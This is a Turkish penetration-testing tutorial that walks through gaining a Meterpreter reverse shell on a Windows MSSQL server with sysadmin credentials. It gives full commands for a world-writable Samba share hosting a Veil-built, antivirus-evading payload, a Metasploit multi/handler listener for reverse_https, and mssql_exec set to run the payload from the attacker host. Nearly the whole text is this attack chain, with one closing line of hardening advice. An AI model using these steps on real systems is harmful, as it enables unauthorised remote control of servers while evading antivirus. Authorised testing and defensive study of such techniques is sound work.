MSF mssql_exec & Veil: MSSQL Hesabı ile Antivirüslere Yakalanmadan Meterpreter Kabuğu Elde Etme

MSF mssql_exec & Veil: MSSQL Hesabı ile Antivirüslere Yakalanmadan Meterpreter Kabuğu Elde Etme

Sızma testlerinde MSSQL üzerinde yetkili bir hesaba ait kimlik bilgileri tespit edildiği halde işletim sistemine erişim sağlanamayabilmekte veya meterpreter ile erişim sağlama ihtiyacı duyulabilmektedir. Bu yazıda MSSQL sunucu üzerinde sysadmin rolüne (veya işletim sistemi üzerinde komut çalıştırabilecek yetkilere) sahip olan bir hesaba ait bağlantı bilgileri kullanarak MSF mssql_exec modülü yardımıyla meterpreter bağlantısı elde edilecektir.

Yazıda kullanılacak Kali bilgisayarın IP'si 172.22.71.5, SQL sunucusunun IP'si ise 172.22.71.247 olarak ayarlanmıştır. Ayrıca SQL sunucuda güncel durumda olan ve kurumlarda da kullanılan bir antivirüs kuruludur.

Yazı 4 başlıktan oluşacaktır.

1) Saldırgan makinesinde kurban makinenin erişebileceği bir paylaşım açılacaktır.
2) Antivirüslere yakalanmayan ve Meterpreter bağlantısı sağlayacak bir uygulama hazırlanarak saldırgan makinesindeki paylaşıma kaydedilecektir.
3) MSF multi/handler modülü ile Meterpreter bağlantısı dinlenecektir.
4) MSF "mssql_exec" modülü kullanılarak kurban makinede saldırgan makine paylaşımındaki uygulama çalıştırılacak, Kali makinedeki listener ile bağlantı elde edilecektir. Böylece kurban bilgisayarına Meterpreter ile ters bir bağlantı sağlanmış olacaktır.

1) Kali Üzerinde Paylaşımın Açılması

Öncelikle paylasima açılacak ve zararlı uygulamanın konulacağı dizin (/root/veil-output/compiled/ dizini) önceden oluşturulmamışsa oluşturulmalı ve Everyone için tam yetki verilmelidir:

mkdir -p /root/veil-output/compiled/
chmod 777 /root/veil-output/compiled/

Daha sonra, /etc/samba/smb.conf dosyasına aşağıdaki ifadeler eklenir. Böylece ağ erişimi olan bir Windows makinede "\\172.22.71.5\paylasim$" komutu çalıştırılınca, Kali makinenin "/root/veil-output/compiled/" dizinine erişim sağlanmış olacaktır.

[paylasim$]
   comment = Sizma testleri icin hazirlanmistir.
   path = /root/veil-output/compiled/
   browseable = yes
   guest ok = yes
   read only = yes
   public = yes
   writable = yes

Gerekli konfigürasyon yapıldıktan sonra, Kali üzerindeki "samba" servisi başlatılır.

service samba start

2) Meterpreter Oluşturacak Zararlı Uygulamanın Hazırlanması

Kurbana ait Windows bilgisayar ile saldırgana ait Kali bilgisayar arasında meterpreter bağlantısını oluşturacak zararlı uygulama Antivirüsler tarafından tespit edilmeyecek şekilde ayarlanmaldır. Bu uygulamanın hazırlanması için Veil kullanılabilir. Bu uygulamanın Veil kullanılarak hazırlanması ile ilgili ayrıntılı bilgi için bakınız. Hazırlanan uygulama varsayılan olarak "/root/veil-output/compiled/" dizini altına atılmaktadır. Bu sebeple, oluşturulan dosyanın paylaşıma taşınmasına gerek yoktur.

Böylece /root/veil-output/compiled/ dizininde Zararli1.exe adli uygulama oluşmuştur.

Diğer antivirüs atlatma teknikleri için bakınız.

3) Kali Üzerinde Bağlantının Beklenmesi

İstismar işlemi sırasında çalışacak zararlı uygulama bir Meterpreter bağlantısı oluşturacaktır. Bu bağlantının Kali üzerinde elde edilebilmesi için bir listener bağlantısı aşağıdaki gibi kurulabilir:

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.22.71.5
set LPORT 443
set ExitOnSession false
exploit -j

Böylelikle 443. porta gelen "reverse_https" bağlantısı yakalanabilecektir.

4) Paylaşımdaki Zararlı Uygulamanın Çalıştırılması ve Meterpreter Bağlantısının Elde Edilmesi

MSSQL uygulamasında sysadmin rolüne sahip olan bir hesaba ait kullanıcı hesap bilgileri bilindiğinde hedef bilgisayarda komut çalıştırma işlemi gerçekleştirilebilmektedir. Bu amaçla, MSF mssql_exec modülü kullanılacaktır. Bu modül ile ilgili ayrıntılı bilgi aşağıdaki gibidir:

search mssql_exec
use auxiliary/admin/mssql/mssql_exec
show options

MSSQL uygulamasında sysadmin rolüne sahip hesabın adı "sa", parolası ise "s93v43jd5" olarak elde edildiği varsayılırsa, aşağıdaki seçenekle modül ayarlanabilir ve modül çalıştırılabilir:

set CMD start \\\\172.22.71.5\\paylasim$\\Zararli1.exe
set RHOST 172.22.71.247
set PASSWORD s93v43jd5
show options
run

Modül çalıştırıldığında, Kali paylaşımındaki uygulama (\\172.22.71.5\paylasim$\Zararli1.exe) çalıştırılacak ve daha önceden bekleyen multi/handler modülü tarafından yakalanacaktır:

Böylece Kali bilgisayarın diskinde bulunan zararlı yazılım, Windows makinenin diskine kaydedilmeden, Windows bilgisayarın belleğinde (RAM) çalışacaktır. Sonuçta da ters bir HTTPS bağlantı talebi olacak, Kali üzerindeki dinleyici tarafından yakalanmıştır. Ayrıca yukarıdaki ekran görüntüsünde de görüldüğü gibi MSSQLSERVER servisini çalıştıran hesabın yetkileri ile Meterpreter bağlantısı elde edilmiştir. Eğer MSSQLSERVER servisi SYSTEM yetkileri ile çalışmış olsaydı, SYSTEM yetkileri elde edilirdi. Bunun yanında "sa" hesabı yerine, işletim sisteminde kod çalıştırma yetkisi olan başka bir hesap da kullanılabilirdi. Bu sebeple, gereksiz kullanıcı hesaplarının ve yetkilerinin kaldırılması, mevcut parolaların oldukça karmaşık olması tavsiye edilmektedir.